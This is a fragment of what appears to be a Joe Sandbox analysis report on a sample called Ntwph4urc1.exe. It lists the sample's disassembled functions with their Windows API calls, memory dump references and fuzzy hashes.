                                            Download Yara Rule
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree
                                            • String ID: Call
                                            • API String ID: 3394109436-1824292864
                                            • Opcode ID: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                            • Instruction ID: 2334a48e4172ebb904b3f5af91f3a45bddc9a396230004d4704967bba2e99f69
                                            • Opcode Fuzzy Hash: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                            • Instruction Fuzzy Hash: 822162736001109BDB20AF64DDC495A73B4AB18328725453BF952F72D0C6B8A8508BAD
                                            Function 00402522 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402553
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nszB5C8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            • Opcode ID: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                            • Instruction ID: ca3dd7d1b7a13d3c8a9a28b827632004175b2a1fd75c59dcebef83c1aa991e75
                                            • Opcode Fuzzy Hash: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                            • Instruction Fuzzy Hash: 00113AB1911219EBDF14DFA4DE589AEB774FF04354B20843BE402B62D0D7B88A44DB6E
                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                            • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                            • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                            • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                            Function 0040242C Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040244E
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CloseDeleteValue
                                            • String ID:
                                            • API String ID: 2831762973-0
                                            • Opcode ID: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                            • Instruction ID: b1f28ea4fe1f397702134e154a5d50ad3aafc71d487b2ad51b946e19fd30fa70
                                            • Opcode Fuzzy Hash: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                            • Instruction Fuzzy Hash: 3CF09672A00120ABDB10AFA89B4DAAE73B5AF45314F12443FF651B71C1DAFC5D01963E
                                            Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                            • Instruction ID: a2c3742fa11dc5cf357e4fc2c1b39d3237f925362780464401897514ce5169fc
                                            • Opcode Fuzzy Hash: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                            • Instruction Fuzzy Hash: 64E09A72A042009FD704EFA4AE488AEB3B4EB90325B20497FE401F20C1CBB85D00862E
                                            Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                            • Instruction ID: b2fefa23d47a0510f6e3c17d58d1e446f1e854612225740054352d4863a47d08
                                            • Opcode Fuzzy Hash: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                            • Instruction Fuzzy Hash: 5CE0BF76B24114ABCB18DFA8ED90C6E77B6EB95310720847AE512B3690C679AD10CB68
                                            Function 004067E3 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                              • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                              • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                              • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                            • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                            • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                            • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                            Function 00405EE4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                            Function 00405EBF Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,00405AC4,?,?,00000000,00405C9A,?,?,?,?), ref: 00405EC4
                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                            • Instruction ID: 9f802252afbb128bb6d2778500f244350c46036787b5d1505cff2c7139ff2394
                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                            • Instruction Fuzzy Hash: 3CD0C9725055306BC2102728EE0C89BBB55EB64271B114A35F9A5A62B0CB304C528A98
                                            Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                            • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                            • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                            • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                            Function 74352AF8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileA.KERNELBASE(00000000), ref: 74352BB7
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
